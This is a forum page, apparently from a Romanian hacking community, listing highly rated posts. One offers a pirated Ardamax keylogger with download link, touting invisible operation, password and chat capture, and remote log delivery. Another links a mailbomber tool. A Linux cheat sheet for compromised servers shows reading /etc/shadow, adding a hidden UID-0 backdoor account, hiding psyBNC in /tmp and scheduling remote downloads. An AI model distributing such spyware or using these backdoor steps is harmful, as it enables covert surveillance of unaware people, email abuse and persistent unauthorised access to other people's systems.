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Showing content with the highest reputation on 03/12/11 in all areas

  1. Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited. This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7. Keylogger Features: * Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring! * FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery. * Network delivery - sends recorded logs through via LAN. * Clipboard logging - capture all text copied to the Windows Clipboard. * Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 2000/XP/2003/Vista/Windows 7 Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list. * Visual surveillance - periodically makes screenshots and stores the compressed images to log. * Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats: o AIM o Windows Live Messenger 2011 o ICQ 7 o Skype 4 o Yahoo Messenger 10 o Google Talk o Miranda o QiP 2010 * Security - allows you to protect program settings, Hidden Mode and Log file. * Application monitoring - keylogger will record the application that was in use that received the keystroke! * Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke! * Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer. * Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher. * Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets. * It records every keystroke. Captures passwords and all other invisible text. Other Features: * Windows 2000/2003/XP/Vista/Windows 7 support * Monitors multi-user machines * Automatic startup * Friendly interface * Easy to install Enjoy;) Download: http://www.filesonic.com/file/77948562/Ardamax_Keylogger_v3.5.3_+_Serial_[Only_Here].rar L-am cumparat de curand si am zis sa il impart si cu voi Bucurati-va http://www.virustotal.com/file-scan/report.html?id=820255ca92ded7b0e31536ea59731143ded7a7de8fbf893861dc2793c666c3df-1297258343
    1 point
  2. Demo aveti aici http://www.sdkexpert.net/mailbomber/ Download: http://www.sdkexpert.net/mailbomber/download/
    1 point
  3. nu-ti dau ban ca a fost ziua ta ieri... CLOSED+TRASHED
    -1 points
  4. - cd -> deschidere de director /in acelasi timp si iesi dintr-un director cu ea pana in /home director ; - cd - (minus) -> mergi la directorul anterior - cd dir && command -> / dechide director , executa comanda si se intoarce in directorul precedent . - ls -> afiseaza continutul unui director - ls -lrt -> listeaza rapid fiserele din dir curent aranjandule dupa data modificarii . - pico -> Pe majoritatea sistemelor - editeaza un fisier / de ex ai fisier : mech.set // dai pico mech.set - vi -> similar cu pico doar ca e un program diferit . / de ex : vi mech.set - cat -> nu editeaza ci doar citeste fisere . - gpg -c file -> encripteaza fisiere - gpg file.gpg -> decripteaza un fiser de extensie .gpg - echo 'wget url' | at 01:00 ->echo e ceva gen schedule pe windows -// dai echo si comanda | at time /i love this command - echo I live in <country> -> / afiseaza date despre tara respectiva . - tar c dir/ | bzip2 > dir.tar.bz2 -> arhiveaza directorul introdus . - tar cvzf folder.tgz folder/ - arhiveaza folderul respectiv . - tar -zxvf ( sau tar xzvf) -> dezarhiveaza o arhiva : de ex ai arhiva : emech- darwin.tar.gz // tar xzvf emech-darwin.tar.gz - wget url -> downloadeaza url-ul introdus . - hostname -i -> afiseaza ip-ul serverului respectiv // echivalent cu -> hostname /. - cal -3 -> afiseaza calendar - cal 9 1752 -> afiseaza calendarul pt luna a9a din anul 1752 - date -d fri -> afiseaza data acestei vineri . - w -> listeaza toate conexiunile in momentul respectiv la serverul pe care esti ; - lsof -p $$ -> afiseaza adresele proceselor pornite de userul de pe care esti . - lsof ~ -> afiseaza procesele apelate de cele la care ti s-a aratat adresa cu comanda anterioara . - lynx url -> navighezi pe internet de pe linux /ex : lynx www.sifak.3x.ro/ nu exista ) ( nu merge la toate sistemele ) - passwd -> meniu de schimbare de parola pt userul pe care esti . - pwd -> afiseaza adresa directorului in care esti . - mkdir -> creeaza director /ex : mkdir stef - mv -> muta un fisier/director intr-o locatie : /ex : mv psybnc.tgz /tmp/.stef - cat /etc/issue -> ca sa afli ce versiune de linux ai . - /sbin/ifconfig | grep inet -> vezi ip-urile serverului . - cat /etc/hosts -> iti arat host-urile root-ului . - cat /etc/passwd -> astfel sti cate usere si ce usere sunt . - /usr/sbin/useradd user -> Adaugi un user . - /usr/sbin/useradd -o -u 0 user -> Adaugi un user dar cu drept de root - /usr/sbin/userdel useru -> stergi usere . COMENZI FOLOSITE PE ROOT : comenzii linux (root) w -->iti arata uptime, si cine mai e online who -->iti arata cine mai e online pe sistem ocklist => ce porturi are deschise cat /etc/shadow => parole scriptate /sbin/ifconfig | grep inet => ce ip-uri are /etc/hosts => vhost-urile /usr/sbin/adduser -g0 | passwd | /usr/sbin/userdel cat /etc/passwd => ce usere are w , uptime => arata de cate zile este serverul sus id, whoami => arata dreptul pe care il avem pe root: apache sau root ls, dir => arata continutul unui folder rm -rf => aterge un folder sau fisier Impachetez un fisier tar chf fisier.tar fisier => tar zcd fisier.tar director ping -c1 yahoo.com => Vad ip la un server /sbin/ipchains -A input --destination-port -p tcp -j REJECT route add -host ip-ul reject Inchid un port anume cat /proc/cpuinfo Informatii despre sistem rpm -Uhv arhiva despachetez arhiva rpm gzip -9 ex.tar modifik extensia tar in tar.gz /usr/sbin/useradd -o -u 0 http fak shell cat /etc/issue vad versiunea de linux gcc program.c -o program compilez un program df -h vad cat spatiu are hardu /etc/rc.d/init.d Afisate Pidurile cat /etc/hosts Vad Vhosturile netstat -aut VAd cine mai ii pe roata cat /etc/*release Vad versiunea de linux alias ls='dir --color=tty' Bag ls /usr/sbin/userdel user Sterg user find / -name ".. " -print -xdev caut foldere ascunse find / -name ".*" -print -xdev | cat -v caut foldere ascunse
    -1 points
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